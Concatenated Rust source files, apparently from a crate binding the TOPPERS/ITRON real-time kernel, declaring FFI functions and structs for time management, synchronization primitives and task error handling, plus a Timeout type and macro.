#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_TSK {
    /// Task ID
    pub tskid: ID,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_SEM {
    /// Semaphore ID
    pub semid: ID,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_FLG {
    /// Eventflag ID
    pub flgid: ID,
    #[cfg(all(
        any(feature = "solid_asp3", feature = "solid_fmp3"),
        target_pointer_width = "64",
    ))]
    pub __pad_for_aarch64: u32,
    /// Bit pattern to set
    pub flgptn: FLGPTN,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_NFY_DTQ {
    /// Dataqueue ID
    pub dtqid: ID,
    #[cfg(all(
        any(feature = "solid_asp3", feature = "solid_fmp3"),
        target_pointer_width = "64",
    ))]
    pub __pad_for_aarch64: u32,
    /// Value to send
    pub data: isize,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ENFY_VAR {
    /// Address of the variable
    pub p_var: *mut isize,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_ENFY_DTQ {
    /// Dataqueue ID
    pub dtqid: ID,
}
/// Time management facility
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn set_tim(systim: SYSTIM) -> ER;
    pub fn get_tim(p_systim: *mut SYSTIM) -> ER;
    pub fn adj_tim(adjtim: i32) -> ER;
    pub fn fch_hrt() -> HRTCNT;
    pub fn sta_cyc(cycid: ID) -> ER;
    pub fn stp_cyc(cycid: ID) -> ER;
    pub fn ref_cyc(cycid: ID, pk_rcyc: *mut T_RCYC) -> ER;
    pub fn sta_alm(almid: ID, almtim: RELTIM) -> ER;
    pub fn stp_alm(almid: ID) -> ER;
    pub fn ref_alm(almid: ID, pk_ralm: *mut T_RALM) -> ER;
}
/// Time management facility (dynamic creation)
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
    pub fn acre_cyc(pk_ccyc: *const T_CCYC) -> ER_ID;
    pub fn acre_alm(pk_calm: *const T_CALM) -> ER_ID;
    pub fn del_cyc(cycid: ID) -> ER;
    pub fn del_alm(almid: ID) -> ER;
}
/// Time management facility (multiprocessor variants)
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
    pub fn msta_cyc(cycid: ID, prcid: ID) -> ER;
    pub fn msta_alm(almid: ID, almtim: RELTIM, prcid: ID) -> ER;
}
/// Time management facility (overrun handlers)
#[cfg(all(feature = "asp3", feature = "ovrhdr"))]
extern "C" {
    pub fn sta_ovr(tskid: ID, ovrtim: super::PRCTIM) -> ER;
    pub fn stp_ovr(tskid: ID) -> ER;
    pub fn ref_ovr(tskid: ID, pk_rovr: *mut T_ROVR) -> ER;
}
<file_sep>/src/wait.rs
//! Shared definitions for waitable objects
pub use crate::abi;
/// Specifies the sorting order of a wait queue.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum QueueOrder {
    /// The wait queue is processed in a FIFO order.
    Fifo,
    /// The wait queue is processed in a task priority order.
    TaskPriority,
}
impl QueueOrder {
    /// Convert `self` to a value of type [`abi::ATR`].
    ///
    /// Maps [`Self::Fifo`] to `TA_NULL` and [`Self::TaskPriority`] to
    /// `TA_TPRI`.
    #[inline]
    pub fn as_raw_atr(self) -> abi::ATR {
        match self {
            #[cfg(not(feature = "none"))]
            Self::Fifo => abi::TA_NULL,
            #[cfg(not(feature = "none"))]
            Self::TaskPriority => abi::TA_TPRI,
            // With the `none` pseudo-kernel, no ABI constants exist, so there
            // is no meaningful value to return.
            #[cfg(feature = "none")]
            _ => unreachable!(),
        }
    }
}
<file_sep>/src/abi/sync.rs
use super::{uint_t, ATR, ER, ER_ID, FLGPTN, ID, MODE, PRI, RELTIM, STAT, TMO};
/*
 * Object attributes
 */
/// Order the task wait queue by task priority
pub const TA_TPRI: ATR = 0x01;
/// Multiple waiting tasks
pub const TA_WMUL: ATR = 0x02;
/// Clear the eventflag (when a wait is released)
pub const TA_CLR: ATR = 0x04;
/// Priority ceiling protocol
pub const TA_CEILING: ATR = 0x03;
#[cfg(all(feature = "solid_asp3", feature = "pi_mutex"))]
/// Priority inheritance protocol
pub const TA_INHERIT: ATR = 0x02;
/*
 * Service call operating mode definitions
 */
/// OR wait on an eventflag
pub const TWF_ORW: MODE = 0x01;
/// AND wait on an eventflag
pub const TWF_ANDW: MODE = 0x02;
/*
 * Object state definitions
 */
/// The spin lock is not acquired
#[cfg(feature = "fmp3")]
pub const TSPN_UNL: STAT = 0x01;
/// The spin lock is acquired
#[cfg(feature = "fmp3")]
pub const TSPN_LOC: STAT = 0x02;
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RSEM {
    /// ID of the task at the head of the semaphore's wait queue
    pub wtskid: ID,
    /// Current resource count of the semaphore
    pub semcnt: uint_t,
}
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RFLG {
    /// ID of the task at the head of the eventflag's wait queue
    pub wtskid: ID,
    /// Current bit pattern of the eventflag
    pub flgptn: FLGPTN,
}
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RDTQ {
    /// ID of the task at the head of the dataqueue's send wait queue
    pub stskid: ID,
    /// ID of the task at the head of the dataqueue's receive wait queue
    pub rtskid: ID,
    /// Number of data items stored in the dataqueue's storage area
    pub sdtqcnt: uint_t,
}
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RPDQ {
    /// ID of the task at the head of the priority dataqueue's send wait queue
    pub stskid: ID,
    /// ID of the task at the head of the priority dataqueue's receive wait queue
    pub rtskid: ID,
    /// Number of data items stored in the priority dataqueue's storage area
    pub spdqcnt: uint_t,
}
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMTX {
    /// ID of the task that holds a lock on the mutex
    pub htskid: ID,
    /// ID of the task at the head of the mutex's wait queue
    pub wtskid: ID,
}
#[cfg(any(
    all(feature = "asp3", feature = "messagebuf"),
    all(feature = "solid_asp3", feature = "messagebuf")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RMBF {
    /// ID of the task at the head of the message buffer's send wait queue
    pub stskid: ID,
    /// ID of the task at the head of the message buffer's receive wait queue
    pub rtskid: ID,
    /// Number of messages stored in the message buffer's storage area
    pub smbfcnt: uint_t,
    /// Size of the free space in the message buffer's storage area
    pub fmbfsz: usize,
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_RSPN {
    /// Lock state of the spin lock
    pub spnstat: STAT,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CSEM {
    /// Semaphore attributes
    pub sematr: ATR,
    /// Initial resource count of the semaphore
    pub isemcnt: uint_t,
    /// Maximum resource count of the semaphore
    pub maxsem: uint_t,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CFLG {
    /// Eventflag attributes
    pub flgatr: ATR,
    /// Initial bit pattern of the eventflag
    pub iflgptn: FLGPTN,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CDTQ {
    /// Dataqueue attributes
    pub dtqatr: ATR,
    /// Number of data items the dataqueue's storage area can hold
    pub dtqcnt: uint_t,
    /// Start address of the dataqueue's storage area
    pub dtqmb: *mut u8,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CPDQ {
    /// Priority dataqueue attributes
    pub pdqatr: ATR,
    /// Number of data items the priority dataqueue's storage area can hold
    pub pdqcnt: uint_t,
    /// Maximum data priority that can be sent to the priority dataqueue
    pub maxdpri: PRI,
    /// Start address of the priority dataqueue's storage area
    pub pdqmb: *mut u8,
}
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMTX {
    /// Mutex attributes
    pub mtxatr: ATR,
    /// Ceiling priority of the mutex
    pub ceilpri: PRI,
}
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CSPN {
    /// Spin lock attributes
    pub spnatr: ATR,
}
/// SOLID/ASP3 extension
#[cfg(all(feature = "solid_asp3", feature = "dcre", feature = "messagebuf"))]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[repr(C)]
pub struct T_CMBF {
    /// Message buffer attributes
    pub mbfatr: ATR,
    /// Maximum message length
    pub maxmsz: uint_t,
    /// Size of the message buffer's storage area
    pub mbfsz: usize,
    /// Start address of the message buffer's storage area
    pub mbfmb: *mut u8,
}
/// Synchronization and communication facility
#[cfg(any(
    feature = "asp3",
    feature = "fmp3",
    feature = "solid_asp3",
    feature = "solid_fmp3"
))]
extern "C" {
    pub fn sig_sem(semid: ID) -> ER;
    pub fn wai_sem(semid: ID) -> ER;
    pub fn pol_sem(semid: ID) -> ER;
    pub fn twai_sem(semid: ID, tmout: TMO) -> ER;
    pub fn ini_sem(semid: ID) -> ER;
    pub fn ref_sem(semid: ID, pk_rsem: *mut T_RSEM) -> ER;
    pub fn set_flg(flgid: ID, setptn: FLGPTN) -> ER;
    pub fn clr_flg(flgid: ID, clrptn: FLGPTN) -> ER;
    pub fn wai_flg(flgid: ID, waiptn: FLGPTN, wfmode: MODE, p_flgptn: *mut FLGPTN) -> ER;
    pub fn pol_flg(flgid: ID, waiptn: FLGPTN, wfmode: MODE, p_flgptn: *mut FLGPTN) -> ER;
    pub fn twai_flg(
        flgid: ID,
        waiptn: FLGPTN,
        wfmode: MODE,
        p_flgptn: *mut FLGPTN,
        tmout: TMO,
    ) -> ER;
    pub fn ini_flg(flgid: ID) -> ER;
    pub fn ref_flg(flgid: ID, pk_rflg: *mut T_RFLG) -> ER;
    pub fn snd_dtq(dtqid: ID, data: isize) -> ER;
    pub fn psnd_dtq(dtqid: ID, data: isize) -> ER;
    pub fn tsnd_dtq(dtqid: ID, data: isize, tmout: TMO) -> ER;
    pub fn fsnd_dtq(dtqid: ID, data: isize) -> ER;
    pub fn rcv_dtq(dtqid: ID, p_data: *mut isize) -> ER;
    pub fn prcv_dtq(dtqid: ID, p_data: *mut isize) -> ER;
    pub fn trcv_dtq(dtqid: ID, p_data: *mut isize, tmout: TMO) -> ER;
    pub fn ini_dtq(dtqid: ID) -> ER;
    pub fn ref_dtq(dtqid: ID, pk_rdtq: *mut T_RDTQ) -> ER;
    pub fn snd_pdq(pdqid: ID, data: isize, datapri: PRI) -> ER;
    pub fn psnd_pdq(pdqid: ID, data: isize, datapri: PRI) -> ER;
    pub fn tsnd_pdq(pdqid: ID, data: isize, datapri: PRI, tmout: TMO) -> ER;
    pub fn rcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI) -> ER;
    pub fn prcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI) -> ER;
    pub fn trcv_pdq(pdqid: ID, p_data: *mut isize, p_datapri: *mut PRI, tmout: TMO) -> ER;
    pub fn ini_pdq(pdqid: ID) -> ER;
    pub fn ref_pdq(pdqid: ID, pk_rpdq: *mut T_RPDQ) -> ER;
    pub fn loc_mtx(mtxid: ID) -> ER;
    pub fn ploc_mtx(mtxid: ID) -> ER;
    pub fn tloc_mtx(mtxid: ID, tmout: TMO) -> ER;
    pub fn unl_mtx(mtxid: ID) -> ER;
    pub fn ini_mtx(mtxid: ID) -> ER;
    pub fn ref_mtx(mtxid: ID, pk_rmtx: *mut T_RMTX) -> ER;
}
/// Synchronization and communication facility (spin locks)
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
    pub fn loc_spn(spnid: ID) -> ER;
    pub fn unl_spn(spnid: ID) -> ER;
    pub fn try_spn(spnid: ID) -> ER;
    pub fn ref_spn(spnid: ID, pk_rspn: *mut T_RSPN) -> ER;
}
/// Synchronization and communication facility (dynamic creation)
#[cfg(any(
    all(feature = "asp3", feature = "dcre"),
    all(feature = "solid_asp3", feature = "dcre"),
    all(feature = "solid_fmp3", feature = "dcre")
))]
extern "C" {
    pub fn acre_sem(pk_csem: *const T_CSEM) -> ER_ID;
    pub fn acre_flg(pk_cflg: *const T_CFLG) -> ER_ID;
    pub fn acre_dtq(pk_cdtq: *const T_CDTQ) -> ER_ID;
    pub fn acre_pdq(pk_cpdq: *const T_CPDQ) -> ER_ID;
    pub fn acre_mtx(pk_cmtx: *const T_CMTX) -> ER_ID;
    pub fn del_sem(semid: ID) -> ER;
    pub fn del_flg(flgid: ID) -> ER;
    pub fn del_dtq(dtqid: ID) -> ER;
    pub fn del_pdq(pdqid: ID) -> ER;
    pub fn del_mtx(mtxid: ID) -> ER;
}
/// Synchronization and communication facility (spin lock creation)
#[cfg(all(feature = "solid_fmp3", feature = "dcre"))]
extern "C" {
    pub fn acre_spn(pk_cspn: *const T_CSPN) -> ER_ID;
    pub fn del_spn(spnid: ID) -> ER;
}
/// Synchronization and communication facility (message buffers)
#[cfg(any(
    all(feature = "asp3", feature = "messagebuf"),
    all(feature = "solid_asp3", feature = "messagebuf")
))]
extern "C" {
    pub fn snd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t) -> ER;
    pub fn psnd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t) -> ER;
    pub fn tsnd_mbf(mbfid: ID, msg: *const u8, msgsz: uint_t, tmout: TMO) -> ER;
    pub fn rcv_mbf(mbfid: ID, msg: *mut u8) -> super::ER_UINT;
    pub fn prcv_mbf(mbfid: ID, msg: *mut u8) -> super::ER_UINT;
    pub fn trcv_mbf(mbfid: ID, msg: *mut u8, tmout: TMO) -> super::ER_UINT;
    pub fn ini_mbf(mbfid: ID) -> ER;
    pub fn ref_mbf(mbfid: ID, pk_rmbf: *mut T_RMBF) -> ER;
}
/// SOLID/ASP3 extension
#[cfg(all(feature = "solid_asp3", feature = "dcre", feature = "messagebuf"))]
extern "C" {
    pub fn acre_mbf(pk_cmbf: *const T_CMBF) -> ER_ID;
    pub fn del_mbf(mbfid: ID) -> ER;
}
<file_sep>/src/time/timeout.rs
use crate::abi;
use core::{convert::TryFrom, time::Duration as StdDuration};
use super::Duration;
/// A valid timeout value ([`abi::TMO`]).
///
/// In addition to finite durations, this type can represent the following
/// special values:
/// [`ZERO`] indicating zero or polling and [`FOREVER`] representing an
/// infinite duration. **`TMO_NBLK` is not a valid value for this type.**
///
/// [`ZERO`]: Self::ZERO
/// [`FOREVER`]: Self::FOREVER
#[cfg_attr(
    feature = "nightly",
    doc = "[`timeout!`] can be used to construct a `Timeout` in a concise syntax."
)]
#[cfg_attr(
    not(feature = "nightly"),
    doc = "If `nightly` feature is enabled, \
           `timeout!` can be used to construct a `Timeout` in a concise syntax."
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[repr(transparent)]
pub struct Timeout {
    // Invariant: always a valid `TMO` value (`TMO_POL`, `TMO_FEVR`, or a
    // finite relative time); never `TMO_NBLK`.
    value: abi::TMO,
}
impl Timeout {
    /// The zero timeout value, which causes polling.
    // Safety: `TMO_POL` is a valid timeout value
    pub const ZERO: Self = unsafe { Self::from_raw(abi::TMO_POL) };
    /// The infinite timeout value.
    // Safety: `TMO_FEVR` is a valid timeout value
    pub const FOREVER: Self = unsafe { Self::from_raw(abi::TMO_FEVR) };
    /// Construct a new `Timeout` from a raw value.
    ///
    /// # Safety
    ///
    /// `value` must be a valid timeout value. This crate treats `E_PAR` caused
    /// by invalid timeout values as a [critical error].
    ///
    /// [critical error]: crate::error
    #[inline]
    pub const unsafe fn from_raw(value: abi::TMO) -> Self {
        Self { value }
    }
    /// Get the raw `TMO` value.
    #[inline]
    pub const fn as_raw(self) -> abi::TMO {
        self.value
    }
    /// Return `true` if `self` represents a finite duration, i.e., it is not
    /// [`Self::FOREVER`].
    #[inline]
    pub const fn is_finite(self) -> bool {
        !(self.value == Self::FOREVER.value)
    }
    /// Construct a new `Timeout` from the specified number of seconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_secs(secs: u64) -> Option<Self> {
        // Overflow-checked conversion to microseconds.
        match secs.checked_mul(1_000_000) {
            Some(micros) => Self::from_micros(micros),
            None => None,
        }
    }
    /// Construct a new `Timeout` from the specified number of milliseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_millis(millis: u64) -> Option<Self> {
        // Overflow-checked conversion to microseconds.
        match millis.checked_mul(1_000) {
            Some(micros) => Self::from_micros(micros),
            None => None,
        }
    }
    /// Construct a new `Timeout` from the specified number of microseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_micros(micros: u64) -> Option<Self> {
        if micros <= abi::TMAX_RELTIM as u64 {
            // Safety: every value in `0..=TMAX_RELTIM` is a valid timeout value
            Some(unsafe { Self::from_raw(micros as u32) })
        } else {
            None
        }
    }
    /// Construct a new `Timeout` from the specified number of nanoseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub fn from_nanos(nanos: u128) -> Option<Self> {
        // TODO: make it `const fn`
        let micros = u64::try_from(nanos / 1_000).ok()?;
        Self::from_micros(micros)
    }
}
/// The error type returned when a checked duration conversion fails.
pub struct TryFromDurationError(pub(super) ());
impl TryFrom<StdDuration> for Timeout {
    type Error = TryFromDurationError;
    /// Convert a [`core::time::Duration`] to a `Timeout`, failing if the
    /// duration exceeds the representable range.
    #[inline]
    fn try_from(d: StdDuration) -> Result<Self, Self::Error> {
        Self::from_nanos(d.as_nanos()).ok_or(TryFromDurationError(()))
    }
}
impl TryFrom<Duration> for Timeout {
    type Error = TryFromDurationError;
    /// Convert a kernel [`Duration`] to a `Timeout`. This conversion is
    /// currently infallible (see the comment below), but the `TryFrom`
    /// signature is kept for forward compatibility.
    #[inline]
    fn try_from(d: Duration) -> Result<Self, Self::Error> {
        match () {
            () => {
                // In TOPPERS 3rd gen kernel, both types use the same range
                // Safety: It's a valid timeout value
                Ok(unsafe { Self::from_raw(d.as_raw()) })
            }
        }
    }
}
/// Construct a [`Timeout`] value in a concise syntax. Panics if the specified
/// duration cannot be represented by `Timeout`.
///
/// # Examples
///
/// ```
/// use itron::time::{timeout, Timeout};
/// assert_eq!(Timeout::ZERO, timeout!(0));
/// assert_eq!(Timeout::FOREVER, timeout!(infinity));
/// assert_eq!(Timeout::from_millis(42).unwrap(), timeout!(ms: 42));
/// ```
///
/// Panics if the value is out of range:
///
/// ```should_panic
/// # use itron::time::timeout;
/// let _ = timeout!(s: 0x7ffffffffffffff * 2);
/// ```
///
/// Once [`inline_const`] lands, it will be possible to do the check at
/// compile-time:
///
/// ```compile_fail
/// #![feature(inline_const)]
/// # use itron::time::timeout;
/// let _ = const { timeout!(s: 0x7ffffffffffffff * 2) };
/// ```
///
/// Literal values are validated at compile-time regardless of whether
/// `const { ... }` is used or not:
///
/// ```compile_fail
/// # use itron::time::timeout;
/// let _ = timeout!(s: 0xfffffffffffffff);
/// ```
///
/// ```should_panic
/// # use itron::time::timeout;
/// // Wrap the expression with `( ... )` to avoid the above behavior and
/// // cause a runtime panic.
/// let _ = timeout!(s: (0xfffffffffffffff));
/// ```
///
/// [`inline_const`]: https://rust-lang.github.io/rfcs/2920-inline-const.html
#[cfg(feature = "nightly")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "nightly")))]
pub macro timeout {
    // Compile-time checked literals: evaluating the conversion in a `const`
    // item forces validation (and any panic) to happen at compile time.
    ($kind:tt: $value:literal) => {{
        const VALUE: $crate::time::Timeout = $crate::time::timeout!($kind: ($value));
        VALUE
    }},
    // Seconds
    (s: $value:expr) => {
        $crate::time::expect_valid_timeout($crate::time::Timeout::from_secs($value))
    },
    // Milliseconds
    (ms: $value:expr) => {
        $crate::time::expect_valid_timeout($crate::time::Timeout::from_millis($value))
    },
    // Microseconds
    (us: $value:expr) => {
        $crate::time::expect_valid_timeout($crate::time::Timeout::from_micros($value))
    },
    // Microseconds (Greek letter "μ" alias of the `us:` rule above)
    (μs: $value:expr) => {
        $crate::time::expect_valid_timeout($crate::time::Timeout::from_micros($value))
    },
    // Nanoseconds
    (ns: $value:expr) => {
        $crate::time::expect_valid_timeout($crate::time::Timeout::from_nanos($value))
    },
    // Infinity
    (infinity) => { $crate::time::Timeout::FOREVER },
    // Zero
    (0) => { $crate::time::Timeout::ZERO },
}
/// Panics if the specified `Option<Timeout>` is `None`. Used by `timeout!`.
#[cfg(feature = "nightly")]
#[doc(hidden)]
#[track_caller]
#[inline]
pub const fn expect_valid_timeout(x: Option<Timeout>) -> Timeout {
    if let Some(x) = x {
        x
    } else {
        // Panics in `const fn` are unstable at the point of writing
        // The division by zero below forces a failure; the long variable
        // name doubles as the "panic message" in the resulting diagnostic.
        let zero = 0u32;
        #[allow(unconditional_panic)]
        let __the_specified_timeout_is_invalid_or_not_representable__ = 1 / zero;
        #[allow(clippy::empty_loop)]
        loop {}
    }
}
<file_sep>/src/task.rs
//! Tasks
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
processor::Processor,
time::{Duration, Timeout},
};
// TODO: sta_ovr
// TODO: stp_ovr
// TODO: ref_ovr
// TODO: chg_spr
// TODO: chg_spr
// TODO: TA_NOACTQUE
// TODO: TA_RTSK
define_error_kind! {
    /// Error type for [`TaskRef::activate`].
    pub enum ActivateError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        // `#[cfg(any())]` is always false: the variant is kept in the
        // source but compiled out on every configuration.
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        QueueOverflow,
    }
}
impl ErrorKind for ActivateError {
    // Translate a raw kernel error code into this error kind; codes not
    // listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            // `E_ID` and `E_NOEXS` are both reported as `BadId`
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
// Note: `activate_on` reduces to `activate` on a uniprocessor kernel
define_error_kind! {
    /// Error type for [`TaskRef::activate_on`].
    pub enum ActivateOnError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is a restricted task.
        #[cfg(all(feature = "rstr_task", any()))]
        NotSupported,
        #[cfg(any())]
        AccessDenied,
        #[cfg(not(feature = "none"))]
        QueueOverflow,
        /// The class the task belongs to does not permit assigning tasks to the
        /// specified processor.
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        BadParam,
    }
}
impl ErrorKind for ActivateOnError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(all(feature = "rstr_task", any()))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_QOVR => Some(Self::QueueOverflow(Kind::from_error_code(code))),
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::cancel_activate_all`].
    pub enum CancelActivateAllError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for CancelActivateAllError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::set_base_priority`].
    pub enum SetBasePriorityError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is dormant.
        #[cfg(not(feature = "none"))]
        BadState,
        /// Bad parameter.
        ///
        /// - The task is a restricted task, for which changing the priority is
        /// not supported (NGKI1186).
        ///
        /// - The specified priority is out of range.
        ///
        /// - The task owns a priority-ceiling mutex, and the specified priority
        /// is higher than the mutex's priority ceiling.
        ///
        #[cfg(not(feature = "none"))]
        BadParam,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for SetBasePriorityError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            // Three distinct raw codes are all coalesced into `BadParam`
            #[cfg(not(feature = "none"))]
            abi::E_PAR | abi::E_NOSPT | abi::E_ILUSE => {
                Some(Self::BadParam(Kind::from_error_code(code)))
            }
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`TaskRef::priority`].
    pub enum PriorityError {
        #[cfg(not(feature = "none"))]
        BadContext,
        #[cfg(not(feature = "none"))]
        BadId,
        /// The task is dormant.
        #[cfg(not(feature = "none"))]
        BadState,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for PriorityError {
    // Codes not listed (or compiled out) fall through to `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is a critical error, so it's excluded from here
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
// Note: `migrate` is no-op on a uniprocessor kernel
